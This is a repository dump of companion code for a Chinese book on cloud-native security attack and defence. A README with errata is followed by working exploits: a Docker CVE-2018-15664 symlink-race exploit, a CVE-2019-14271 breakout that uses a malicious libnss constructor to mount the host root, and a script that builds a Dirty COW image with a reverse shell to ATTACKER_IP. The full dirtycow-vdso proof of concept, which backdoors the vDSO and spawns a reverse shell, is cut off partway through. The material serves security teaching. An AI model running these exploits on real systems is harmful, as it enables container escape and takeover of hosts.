Repository: brant-ruan/cloud-native-security-book
Branch: main
Commit: 473a5642e953
Files: 49
Total size: 125.3 KB
Directory structure:
gitextract_faxozo3s/
├── README.md
└── code/
├── 0302-开发侧攻击/
│ ├── 02-CVE-2018-15664/
│ │ └── symlink_race/
│ │ ├── build/
│ │ │ ├── Dockerfile
│ │ │ └── symlink_swap.c
│ │ ├── run_read.sh
│ │ └── run_write.sh
│ └── 03-CVE-2019-14271/
│ ├── breakout
│ └── file-service.c
├── 0303-供应链攻击/
│ ├── 01-CVE-2019-5021-alpine/
│ │ └── Dockerfile
│ └── 02-CVE-2016-5195-malicious-image/
│ └── build.sh
├── 0304-运行时攻击/
│ ├── 01-容器逃逸/
│ │ ├── CVE-2016-5195/
│ │ │ ├── 0xdeadbeef.c
│ │ │ ├── Makefile
│ │ │ └── payload.s
│ │ ├── CVE-2019-5736/
│ │ │ └── main.go
│ │ ├── cause-core-dump.c
│ │ └── tmp-dot-x.py
│ ├── 02-安全容器逃逸/
│ │ ├── build.sh
│ │ ├── change_container_runtime.sh
│ │ ├── clean_kata.sh
│ │ ├── docker/
│ │ │ ├── Dockerfile
│ │ │ ├── attack.sh
│ │ │ ├── bash
│ │ │ └── evil_bin
│ │ ├── evil_agent_src/
│ │ │ ├── grpc.go
│ │ │ └── mount.go
│ │ ├── evil_bin.c
│ │ ├── exploit.sh
│ │ ├── get_kata_src.sh
│ │ └── install_kata.sh
│ └── 03-资源耗尽型攻击/
│ ├── exhaust_cpu.sh
│ ├── exhaust_disk.sh
│ ├── exhaust_mem.sh
│ └── exhaust_pid.sh
├── 0402-Kubernetes组件不安全配置/
│ └── deploy_escape_pod_on_remote_host.sh
├── 0403-CVE-2018-1002105/
│ ├── attacker.yaml
│ ├── cve_2018_1002105_namespace.yaml
│ ├── cve_2018_1002105_pod.yaml
│ ├── cve_2018_1002105_role.yaml
│ ├── cve_2018_1002105_role_binding.yaml
│ ├── exploit.py
│ └── test-token.csv
├── 0404-K8s拒绝服务攻击/
│ ├── CVE-2019-11253-poc.sh
│ └── CVE-2019-9512-poc.py
└── 0405-云原生网络攻击/
├── Dockerfile
├── attacker.yaml
├── build_image.sh
├── cleanup.sh
├── exploit.sh
├── k8s_dns_mitm.py
└── victim.yaml
================================================
FILE CONTENTS
================================================
================================================
FILE: README.md
================================================
# 《云原生安全:攻防实践与体系构建》资料仓库
本仓库提供了《云原生安全:攻防实践与体系构建》一书的补充材料和随书源码,供感兴趣的读者深入阅读、实践。
**本仓库所有内容仅供教学、研究使用,严禁用于非法用途,违者后果自负!**
相关链接:[豆瓣](https://book.douban.com/subject/35640762/) | [京东](https://item.jd.com/13495676.html) | [当当](http://product.dangdang.com/29318802.html)
## 补充阅读资料
- [100_云计算简介.pdf](appendix/100_云计算简介.pdf)
- [101_代码安全.pdf](appendix/101_代码安全.pdf)
- [200_容器技术.pdf](appendix/200_容器技术.pdf)
- [201_容器编排.pdf](appendix/201_容器编排.pdf)
- [202_微服务.pdf](appendix/202_微服务.pdf)
- [203_服务网格.pdf](appendix/203_服务网格.pdf)
- [204_DevOps.pdf](appendix/204_DevOps.pdf)
- [CVE-2017-1002101:突破隔离访问宿主机文件系统.pdf](appendix/CVE-2017-1002101:突破隔离访问宿主机文件系统.pdf)
- [CVE-2018-1002103:远程代码执行与虚拟机逃逸.pdf](appendix/CVE-2018-1002103:远程代码执行与虚拟机逃逸.pdf)
- [CVE-2020-8595:Istio认证绕过.pdf](appendix/CVE-2020-8595:Istio认证绕过.pdf)
- [靶机实验:综合场景下的渗透实战.pdf](appendix/靶机实验:综合场景下的渗透实战.pdf)
## 随书源码
|代码目录|描述|定位|
|:-|:-|:-|
|[0302-开发侧攻击/02-CVE-2018-15664/symlink_race/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race)| CVE-2018-15664漏洞利用代码|3.2.2小节|
|[0302-开发侧攻击/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/03-CVE-2019-14271)|CVE-2019-14271漏洞利用代码|3.2.3小节|
|[0303-供应链攻击/01-CVE-2019-5021-alpine/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-供应链攻击/01-CVE-2019-5021-alpine)|基于存在CVE-2019-5021漏洞的Alpine镜像构建漏洞镜像示例|3.3.1小节|
|[0303-供应链攻击/02-CVE-2016-5195-malicious-image/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0303-供应链攻击/02-CVE-2016-5195-malicious-image)|CVE-2016-5195漏洞利用镜像构建示例|3.3.2小节|
|[0304-运行时攻击/01-容器逃逸/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸)|多个用于容器逃逸的代码片段|3.4.1小节|
|[0304-运行时攻击/02-安全容器逃逸/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/02-安全容器逃逸)|安全容器逃逸的漏洞利用代码|3.4.2小节|
|[0304-运行时攻击/03-资源耗尽型攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/03-资源耗尽型攻击)|资源耗尽型攻击示例代码|3.4.3小节|
|[0402-Kubernetes组件不安全配置/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0402-Kubernetes组件不安全配置/)|K8s不安全配置的利用命令|4.2节|
|[0403-CVE-2018-1002105/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0403-CVE-2018-1002105)|CVE-2018-1002105漏洞利用代码|4.3节|
|[0404-K8s拒绝服务攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0404-K8s拒绝服务攻击/)|CVE-2019-11253和CVE-2019-9512的漏洞利用代码|4.4节|
|[0405-云原生网络攻击/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0405-云原生网络攻击/)|云原生中间人攻击网络环境模拟及攻击代码示例|4.5节|
## 分享与交流
欢迎关注“绿盟科技研究通讯”公众号,我们将持续、高质量地输出信息安全前沿领域研究成果:

## 注意事项
其中部分源码来自网络上其他地方,为方便读者实践,一并归档。这些源码及“摘录出处”为:
1. [0302-开发侧攻击/02-CVE-2018-15664/symlink_race](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race):https://seclists.org/oss-sec/2019/q2/131
2. [0302-开发侧攻击/03-CVE-2019-14271/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0302-开发侧攻击):https://unit42.paloaltonetworks.com/docker-patched-the-most-severe-copy-vulnerability-to-date-with-cve-2019-14271/
3. [0304-运行时攻击/01-容器逃逸/CVE-2016-5195/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195):https://github.com/scumjr/dirtycow-vdso
4. [0304-运行时攻击/01-容器逃逸/CVE-2019-5736/](https://github.com/brant-ruan/cloud-native-security-book/tree/main/code/0304-运行时攻击/01-容器逃逸/CVE-2019-5736):https://github.com/Frichetten/CVE-2019-5736-PoC
引用的项目及代码的许可证(License)以原项目为准。
部分经过笔者修改的源码不再在此列出,书中对相关引用均给出了出处,感兴趣的读者可以参考。
## 勘误及补充说明
### 第1版第3次印刷
#### P56 - 3.4.1 容器逃逸
详见[issue 9](https://github.com/Metarget/cloud-native-security-book/issues/9)。
未来印刷将对原文作以下两处补充和修正:
1. 增加对`#!/proc/self/exe`的必要性的解释(non-dumpable -> dumpable),这里或可提到CVE-2016-9962漏洞。
2. 在攻击步骤中明确给出上下文,消除“一次runC执行中实现覆盖和shellcode执行”的歧义。
感谢读者[@XDTG](https://github.com/XDTG)指出。我们将在后续的印刷中进行补充和修正。
#### P44 - 3.3.1 镜像漏洞利用
详见[issue 8](https://github.com/Metarget/cloud-native-security-book/issues/8)。
第44页下方用于构建镜像的命令不完整,缺少对构建目录的指定。正确的命令如下(注意最后增加了一个`.`):
```bash
docker build --network=host -t alpine:cve-2019-5021 .
```
感谢读者[@WAY29](https://github.com/WAY29)指出。我们将在后续的印刷中进行修正。
#### P42 - 3.2.3 CVE-2019-14271:加载不受信任的动态链接库
详见[issue 7](https://github.com/Metarget/cloud-native-security-book/issues/7)。
感谢读者[@WAY29](https://github.com/WAY29)指出。为了成功编译Glibc,需要事先进行configure操作,才能进行make。我们将在后续的印刷中进行修正。
#### P42 - 3.2.3 CVE-2019-14271:加载不受信任的动态链接库
详见[issue 6](https://github.com/Metarget/cloud-native-security-book/issues/6)。
感谢读者[@XDTG](https://github.com/XDTG)指出。书上的步骤在效果上没有问题,但[@XDTG](https://github.com/XDTG)提出的方案更自然优雅。经验证后,我们考虑在后续的印刷中更新方案。
### 第1版第1次印刷
#### P37 - 3.2.2 CVE-2018-15664:符号链接替换漏洞(这里为补充说明,原文并无错误)
正文第八行开始的段落描述较难理解:
> symlink_swap.c的任务是在容器内创建指向根目录“/”的符号链接,并不断地交换符号链接(由命令行参数传入,如“/totally_safe_path”)与一个正常目录(例如“/totally_safe_path-stashed”)的名字。这样一来,在宿主机上执行 docker cp时,如果首先检查到“/totally_safe_path”是一个正常目录,但在后面执行复制操作时“/totally_safe_path”却变成了一个符号链接,那么Docker将在宿主机上解析这个符号链接。
事实上,在容器内部,一旦开始通过renameat2进行名称交换,`/totally_safe_path`和`/totally_safe_path-stashed`实际上对于我们来说只是两个字符串了,不再与符号链接或正常目录绑定,只有停止交换的那一刻,才会重新确定哪个字符串指向哪个(符号链接或目录)。
因此,书中“这样一来,在宿主机上执行docker cp时,如果首先...”这里,这时,容器内已经开始进行名称交换了。用户(或攻击者)想要去docker cp的是容器内名为`/totally_safe_path`的文件或目录(“十分安全的路径”的意思),这是预期(或者说是这个场景的设定);docker cp在执行过程中,在检查阶段,`/totally_safe_path`路径字符串还指向一个正常目录,但是到了复制操作时,`/totally_safe_path`却已经被交换指向了一个符号链接。
感谢读者@泡泡球麻麻君指出。
#### P85 - 4.2.1 Kubernetes API Server未授权访问(第1版第3次印刷已修复)
正文倒数第四行部分存在歧义:
> 那么攻击者只要网络可达,都能够通过此端口操控集群。
事实上,如果仅仅设置`--insecure-port=8080`,那么服务也只是监听在`localhost`,远程攻击者通常情况下是无法访问的,即使从IP角度来讲是“网络可达的”。如果想要远程操控,还需要配置`--insecure-bind-address=0.0.0.0`才行。
这里的“网络可达”实际上想说明两种情况:
1. 加`--insecure-bind-address`的情况下直接被外部访问,即上面这种;
2. 能够以某种方式访问到localhost,这个场景又包括:
1. 本地用户利用8080端口的服务来提升权限;
2. 基于类似SSRF、DNS rebinding的方式来实现远程访问localhost端口。
================================================
FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/build/Dockerfile
================================================
# Copyright (C) 2018 Aleksa Sarai
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
# Build the binary.
FROM opensuse/leap
RUN zypper in -y gcc glibc-devel-static
RUN mkdir /builddir
COPY symlink_swap.c /builddir/symlink_swap.c
RUN gcc -Wall -Werror -static -o /builddir/symlink_swap /builddir/symlink_swap.c
# Set up our malicious rootfs.
FROM opensuse/leap
ARG SYMSWAP_TARGET=/w00t_w00t_im_a_flag
ARG SYMSWAP_PATH=/totally_safe_path
RUN echo "FAILED -- INSIDE CONTAINER PATH" >"$SYMSWAP_TARGET"
COPY --from=0 /builddir/symlink_swap /symlink_swap
ENTRYPOINT ["/symlink_swap"]
================================================
FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/build/symlink_swap.c
================================================
/*
* Copyright (C) 2018 Aleksa Sarai
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see .
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#define usage() \
do { printf("usage: symlink_swap \n"); exit(1); } while(0)
#define bail(msg) \
do { perror("symlink_swap: " msg); exit(1); } while (0)
/* No glibc wrapper for this, so wrap it ourselves. */
#define RENAME_EXCHANGE (1 << 1)
/*int renameat2(int olddirfd, const char *oldpath,
int newdirfd, const char *newpath, int flags)
{
return syscall(__NR_renameat2, olddirfd, oldpath, newdirfd, newpath, flags);
}*/
/* usage: symlink_swap */
int main(int argc, char **argv)
{
if (argc != 2)
usage();
char *symlink_path = argv[1];
char *stash_path = NULL;
if (asprintf(&stash_path, "%s-stashed", symlink_path) < 0)
bail("create stash_path");
/* Create a dummy file at symlink_path. */
struct stat sb = {0};
if (!lstat(symlink_path, &sb)) {
int err;
if (sb.st_mode & S_IFDIR)
err = rmdir(symlink_path);
else
err = unlink(symlink_path);
if (err < 0)
bail("unlink symlink_path");
}
/*
* Now create a symlink to "/" (which will resolve to the host's root if we
* win the race) and a dummy directory at stash_path for us to swap with.
* We use a directory to remove the possibility of ENOTDIR which reduces
* the chance of us winning.
*/
if (symlink("/", symlink_path) < 0)
bail("create symlink_path");
if (mkdir(stash_path, 0755) < 0)
bail("mkdir stash_path");
/* Now we do a RENAME_EXCHANGE forever. */
for (;;) {
int err = renameat2(AT_FDCWD, symlink_path,
AT_FDCWD, stash_path, RENAME_EXCHANGE);
if (err < 0)
perror("symlink_swap: rename exchange failed");
}
return 0;
}
================================================
FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/run_read.sh
================================================
#!/bin/zsh
# Copyright (C) 2018 Aleksa Sarai
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
SYMSWAP_PATH=/totally_safe_path
SYMSWAP_TARGET=/w00t_w00t_im_a_flag
# Create our flag.
echo "SUCCESS -- COPIED FROM THE HOST" | sudo tee "$SYMSWAP_TARGET"
sudo chmod 000 "$SYMSWAP_TARGET"
# Run and build the malicious image.
docker build -t cyphar/symlink_swap \
--build-arg "SYMSWAP_PATH=$SYMSWAP_PATH" \
--build-arg "SYMSWAP_TARGET=$SYMSWAP_TARGET" build/
ctr_id=$(docker run --rm -d cyphar/symlink_swap "$SYMSWAP_PATH")
# Now continually try to copy the files.
idx=0
while true
do
mkdir "ex${idx}"
docker cp "${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET" "ex${idx}/out"
idx=$(($idx + 1))
done
================================================
FILE: code/0302-开发侧攻击/02-CVE-2018-15664/symlink_race/run_write.sh
================================================
#!/bin/zsh
# Copyright (C) 2018 Aleksa Sarai
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see .
SYMSWAP_PATH=/totally_safe_path
SYMSWAP_TARGET=/w00t_w00t_im_a_flag
# Create our flag.
echo "FAILED -- HOST FILE UNCHANGED" | sudo tee "$SYMSWAP_TARGET"
sudo chmod 0444 "$SYMSWAP_TARGET"
# Run and build the malicious image.
docker build -t cyphar/symlink_swap \
--build-arg "SYMSWAP_PATH=$SYMSWAP_PATH" \
--build-arg "SYMSWAP_TARGET=$SYMSWAP_TARGET" build/
ctr_id=$(docker run --rm -d cyphar/symlink_swap "$SYMSWAP_PATH")
echo "SUCCESS -- HOST FILE CHANGED" | tee localpath
# Now continually try to copy the files.
while true
do
docker cp localpath "${ctr_id}:$SYMSWAP_PATH/$SYMSWAP_TARGET"
done
================================================
FILE: code/0302-开发侧攻击/03-CVE-2019-14271/breakout
================================================
#!/bin/bash
umount /host_fs && rm -rf /host_fs
mkdir /host_fs
mount -t proc none /proc # mount the host's procfs over /proc
cd /proc/1/root # chdir to host's root
mount --bind . /host_fs # mount host root at /host_fs
================================================
FILE: code/0302-开发侧攻击/03-CVE-2019-14271/file-service.c
================================================
// content should be added into nss/nss_files/files-service.c
#include
#include
#include
#include
#define ORIGINAL_LIBNSS "/original_libnss_files.so.2"
#define LIBNSS_PATH "/lib/x86_64-linux-gnu/libnss_files.so.2"
bool is_priviliged();
__attribute__ ((constructor)) void run_at_link(void) {
char * argv_break[2];
if (!is_priviliged())
return;
rename(ORIGINAL_LIBNSS, LIBNSS_PATH);
if (!fork()) {
// Child runs breakout
argv_break[0] = strdup("/breakout");
argv_break[1] = NULL;
execve("/breakout", argv_break, NULL);
}
else
wait(NULL); // Wait for child
return;
}
bool is_priviliged() {
FILE * proc_file = fopen("/proc/self/exe", "r");
if (proc_file != NULL) {
fclose(proc_file);
return false; // can open so /proc exists, not privileged
}
return true; // we're running in the context of docker-tar
}
================================================
FILE: code/0303-供应链攻击/01-CVE-2019-5021-alpine/Dockerfile
================================================
FROM alpine:3.5
RUN apk add --no-cache shadow
RUN adduser -S non_root
USER non_root
================================================
FILE: code/0303-供应链攻击/02-CVE-2016-5195-malicious-image/build.sh
================================================
#!/bin/bash
# modify ATTACKER_IP and ATTACKER_PORT before building
ATTACKER_IP=REVERSE_SHELL_IP
ATTACKER_PORT=REVERSE_SHELL_PORT
TEMP_DIR=./temp-dirtycow
set -e -x
# build ExP
sudo apt update && sudo apt install -y build-essential nasm
mkdir -p $TEMP_DIR
git clone https://github.com/scumjr/dirtycow-vdso.git $TEMP_DIR
cd $TEMP_DIR
make
cd ..
# build malicious image
cat << EOF > ./Dockerfile
FROM ubuntu:18.04
ADD $TEMP_DIR/0xdeadbeef /entrypoint
RUN chmod u+x /entrypoint
ENTRYPOINT ["/entrypoint", "$ATTACKER_IP:$ATTACKER_PORT"]
EOF
sudo docker build -t cve-2016-5195:v1.0 .
rm ./Dockerfile
rm -rf $TEMP_DIR
================================================
FILE: code/0304-运行时攻击/01-容器逃逸/CVE-2016-5195/0xdeadbeef.c
================================================
/*
* CVE-2016-5195 POC
* -scumjr
*/
#define _GNU_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include "payload.h"
#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif
#define PATTERN_IP "\xde\xc0\xad\xde"
#define PATTERN_PORT "\x37\x13"
#define PATTERN_PROLOGUE "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
#define PAYLOAD_IP INADDR_LOOPBACK
#define PAYLOAD_PORT 1234
#define LOOP 0x10000
#define VDSO_SIZE (2 * PAGE_SIZE)
#define ARRAY_SIZE(arr) (sizeof(arr) / sizeof(arr[0]))
typedef unsigned int uint32_t;
typedef unsigned long uint64_t;
struct vdso_patch {
unsigned char *patch;
unsigned char *copy;
size_t size;
void *addr;
};
struct payload_patch {
const char *name;
void *pattern;
size_t pattern_size;
void *buf;
size_t size;
};
struct prologue {
char *opcodes;
size_t size;
};
struct mem_arg {
void *vdso_addr;
bool do_patch;
bool stop;
unsigned int patch_number;
};
static char child_stack[8192];
static struct vdso_patch vdso_patch[2];
static struct prologue prologues[] = {
/* push rbp; mov rbp, rsp; lfence */
{ "\x55\x48\x89\xe5\x0f\xae\xe8", 7 },
/* push rbp; mov rbp, rsp; push r14 */
{ "\x55\x48\x89\xe5\x41\x57", 6 },
/* push rbp; mov rbp, rdi; push rbx */
{ "\x55\x48\x89\xfd\x53", 5 },
/* push rbp; mov rbp, rsp; xchg rax, rax */
{ "\x55\x48\x89\xe5\x66\x66\x90", 7 },
/* push rbp; cmp edi, 1; mov rbp, rsp */
{ "\x55\x83\xff\x01\x48\x89\xe5", 7 },
};
static int writeall(int fd, const void *buf, size_t count)
{
const char *p;
ssize_t i;
p = buf;
do {
i = write(fd, p, count);
if (i == 0) {
return -1;
} else if (i == -1) {
if (errno == EINTR)
continue;
return -1;
}
count -= i;
p += i;
} while (count > 0);
return 0;
}
static void *get_vdso_addr(void)
{
return (void *)getauxval(AT_SYSINFO_EHDR);
}
static int ptrace_memcpy(pid_t pid, void *dest, const void *src, size_t n)
{
const unsigned char *s;
unsigned long value;
unsigned char *d;
d = dest;
s = src;
while (n >= sizeof(long)) {
memcpy(&value, s, sizeof(value));
if (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) {
warn("ptrace(PTRACE_POKETEXT)");
return -1;
}
n -= sizeof(long);
d += sizeof(long);
s += sizeof(long);
}
if (n > 0) {
d -= sizeof(long) - n;
errno = 0;
value = ptrace(PTRACE_PEEKTEXT, pid, d, NULL);
if (value == -1 && errno != 0) {
warn("ptrace(PTRACE_PEEKTEXT)");
return -1;
}
memcpy((unsigned char *)&value + sizeof(value) - n, s, n);
if (ptrace(PTRACE_POKETEXT, pid, d, value) == -1) {
warn("ptrace(PTRACE_POKETEXT)");
return -1;
}
}
return 0;
}
static int patch_payload_helper(struct payload_patch *pp)
{
unsigned char *p;
p = memmem(payload, payload_len, pp->pattern, pp->pattern_size);
if (p == NULL) {
fprintf(stderr, "[-] failed to patch payload's %s\n", pp->name);
return -1;
}
memcpy(p, pp->buf, pp->size);
p = memmem(payload, payload_len, pp->pattern, pp->pattern_size);
if (p != NULL) {
fprintf(stderr,
"[-] payload's %s pattern was found several times\n",
pp->name);
return -1;
}
return 0;
}
/*
* A few bytes of the payload must be patched: prologue, ip, and port.
*/
static int patch_payload(struct prologue *p, uint32_t ip, uint16_t port)
{
int i;
struct payload_patch payload_patch[] = {
{ "port", PATTERN_PORT, sizeof(PATTERN_PORT)-1, &port, sizeof(port) },
{ "ip", PATTERN_IP, sizeof(PATTERN_IP)-1, &ip, sizeof(ip) },
{ "prologue", PATTERN_PROLOGUE, sizeof(PATTERN_PROLOGUE)-1, p->opcodes, p->size },
};
for (i = 0; i < ARRAY_SIZE(payload_patch); i++) {
if (patch_payload_helper(&payload_patch[i]) == -1)
return -1;
}
return 0;
}
/* make a copy of vDSO to restore it later */
static int save_orig_vdso(void)
{
struct vdso_patch *p;
int i;
for (i = 0; i < ARRAY_SIZE(vdso_patch); i++) {
p = &vdso_patch[i];
p->copy = malloc(p->size);
if (p->copy == NULL) {
warn("malloc");
return -1;
}
memcpy(p->copy, p->addr, p->size);
}
return 0;
}
static int build_vdso_patch(void *vdso_addr, struct prologue *prologue)
{
uint32_t clock_gettime_offset, target;
unsigned long clock_gettime_addr;
unsigned char *p, *buf;
uint64_t entry_point;
int i;
/* e_entry */
p = vdso_addr;
entry_point = *(uint64_t *)(p + 0x18);
clock_gettime_offset = (uint32_t)entry_point & 0xfff;
clock_gettime_addr = (unsigned long)vdso_addr + clock_gettime_offset;
/* patch #1: put payload at the end of vdso */
vdso_patch[0].patch = payload;
vdso_patch[0].size = payload_len;
vdso_patch[0].addr = (unsigned char *)vdso_addr + VDSO_SIZE - payload_len;
p = vdso_patch[0].addr;
for (i = 0; i < payload_len; i++) {
if (p[i] != '\x00') {
fprintf(stderr, "failed to find a place for the payload\n");
return -1;
}
}
/* patch #2: hijack clock_gettime prologue */
buf = malloc(sizeof(PATTERN_PROLOGUE)-1);
if (buf == NULL) {
warn("malloc");
return -1;
}
/* craft call to payload */
target = VDSO_SIZE - payload_len - clock_gettime_offset;
memset(buf, '\x90', sizeof(PATTERN_PROLOGUE)-1);
buf[0] = '\xe8';
*(uint32_t *)&buf[1] = target - 5;
vdso_patch[1].patch = buf;
vdso_patch[1].size = prologue->size;
vdso_patch[1].addr = (unsigned char *)clock_gettime_addr;
save_orig_vdso();
return 0;
}
static int backdoor_vdso(pid_t pid, unsigned int patch_number)
{
struct vdso_patch *p;
p = &vdso_patch[patch_number];
return ptrace_memcpy(pid, p->addr, p->patch, p->size);
}
static int restore_vdso(pid_t pid, unsigned int patch_number)
{
struct vdso_patch *p;
p = &vdso_patch[patch_number];
return ptrace_memcpy(pid, p->addr, p->copy, p->size);
}
/*
* Check if vDSO is entirely patched. This function is executed in a different
* memory space thanks to fork(). Return 0 on success, 1 otherwise.
*/
static void check(struct mem_arg *arg)
{
struct vdso_patch *p;
void *src;
int i, ret;
p = &vdso_patch[arg->patch_number];
src = arg->do_patch ? p->patch : p->copy;
ret = 1;
for (i = 0; i < LOOP; i++) {
if (memcmp(p->addr, src, p->size) == 0) {
ret = 0;
break;
}
usleep(100);
}
exit(ret);
}
static void *madviseThread(void *arg_)
{
struct mem_arg *arg;
arg = (struct mem_arg *)arg_;
while (!arg->stop) {
if (madvise(arg->vdso_addr, VDSO_SIZE, MADV_DONTNEED) == -1) {
warn("madvise");
break;
}
}
return NULL;
}
static int debuggee(void *arg_)
{
if (prctl(PR_SET_PDEATHSIG, SIGKILL, 0, 0, 0) == -1)
err(1, "prctl(PR_SET_PDEATHSIG)");
if (ptrace(PTRACE_TRACEME, 0, NULL, NULL) == -1)
err(1, "ptrace(PTRACE_TRACEME)");
kill(getpid(), SIGSTOP);
return 0;
}
/* use ptrace to write to read-only mappings */
static void *ptrace_thread(void *arg_)
{
int flags, ret2, status;
struct mem_arg *arg;
pid_t pid;
void *ret;
arg = (struct mem_arg *)arg_;
flags = CLONE_VM|CLONE_PTRACE;
pid = clone(debuggee, child_stack + sizeof(child_stack) - 8, flags, arg);
if (pid == -1) {
warn("clone");
return NULL;
}
if (waitpid(pid, &status, __WALL) == -1) {
warn("waitpid");
return NULL;
}
ret = NULL;
while (!arg->stop) {
if (arg->do_patch)
ret2 = backdoor_vdso(pid, arg->patch_number);
else
ret2 = restore_vdso(pid, arg->patch_number);
if (ret2 == -1) {
ret = NULL;
break;
}
}
if (ptrace(PTRACE_CONT, pid, NULL, NULL) == -1)
warn("ptrace(PTRACE_CONT)");
if (waitpid(pid, NULL, __WALL) == -1)
warn("waitpid");
return ret;
}
static int exploit_helper(struct mem_arg *arg)
{
pthread_t pth1, pth2;
int ret, status;
pid_t pid;
fprintf(stderr, "[*] %s: patch %d/%ld\n",
arg->do_patch ? "exploit" : "restore",
arg->patch_number + 1,
ARRAY_SIZE(vdso_patch));
/* run "check" in a different memory space */
pid = fork();
if (pid == -1) {
warn("fork");
return -1;
} else if (pid == 0) {
check(arg);
}
arg->stop = false;
pthread_create(&pth1, NULL, madviseThread, arg);
pthread_create(&pth2, NULL, ptrace_thread, arg);
/* wait for "check" process */
if (waitpid(pid, &status, 0) == -1) {
warn("waitpid");
return -1;
}
/* tell the 2 threads to stop and wait for them */
arg->stop = true;
pthread_join(pth1, NULL);
pthread_join(pth2, NULL);
/* check result */
ret = WIFEXITED(status) ? WEXITSTATUS(status) : -1;
if (ret == 0) {
fprintf(stderr, "[*] vdso successfully %s\n",
arg->do_patch ? "backdoored" : "restored");
} else {
fprintf(stderr, "[-] failed to win race condition...\n");
}
return ret;
}
/*
* Apply vDSO patches in the correct order.
*
* During the backdoor step, the payload must be written before hijacking the
* function prologue. During the restore step, the prologue must be restored
* before removing the payload.
*/
static int exploit(struct mem_arg *arg, bool do_patch)
{
unsigned int i;
int ret;
ret = 0;
arg->do_patch = do_patch;
for (i = 0; i < ARRAY_SIZE(vdso_patch); i++) {
if (do_patch)
arg->patch_number = i;
else
arg->patch_number = ARRAY_SIZE(vdso_patch) - i - 1;
if (exploit_helper(arg) != 0) {
ret = -1;
break;
}
}
return ret;
}
static int create_socket(uint16_t port)
{
struct sockaddr_in addr;
int enable, s;
s = socket(AF_INET, SOCK_STREAM, 0);
if (s == -1) {
warn("socket");
return -1;
}
enable = 1;
if (setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &enable, sizeof(enable)) == -1)
warn("setsockopt(SO_REUSEADDR)");
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = INADDR_ANY;
addr.sin_port = port;
if (bind(s, (struct sockaddr *) &addr, sizeof(addr)) == -1) {
warn("failed to bind socket on port %d", ntohs(port));
close(s);
return -1;
}
if (listen(s, 1) == -1) {
warn("listen");
close(s);
return -1;
}
return s;
}
/* interact with reverse connect shell */
static int yeah(struct mem_arg *arg, int s)
{
struct sockaddr_in addr;
struct pollfd fds[2];
socklen_t addr_len;
char buf[4096];
nfds_t nfds;
int c, n;
fprintf(stderr, "[*] waiting for reverse connect shell...\n");
addr_len = sizeof(addr);
while (1) {
c = accept(s, (struct sockaddr *)&addr, &addr_len);
if (c == -1) {
if (errno == EINTR)
continue;
warn("accept");
return -1;
}
break;
}
close(s);
fprintf(stderr, "[*] enjoy!\n");
if (fork() == 0) {
if (exploit(arg, false) == -1)
fprintf(stderr, "[-] failed to restore vDSO\n");
exit(0);
}
fds[0].fd = STDIN_FILENO;
fds[0].events = POLLIN;
fds[1].fd = c;
fds[1].events = POLLIN;
nfds = 2;
while (nfds > 0) {
if (poll(fds, nfds, -1) == -1) {
if (errno == EINTR)
continue;
warn("poll");
break;
}
if (fds[0].revents == POLLIN) {
n = read(STDIN_FILENO, buf, sizeof(buf));
if (n == -1) {
if (errno != EINTR) {
warn("read(STDIN_FILENO)");
break;
}
} else if (n == 0) {
break;
} else {
writeall(c, buf, n);
}
}
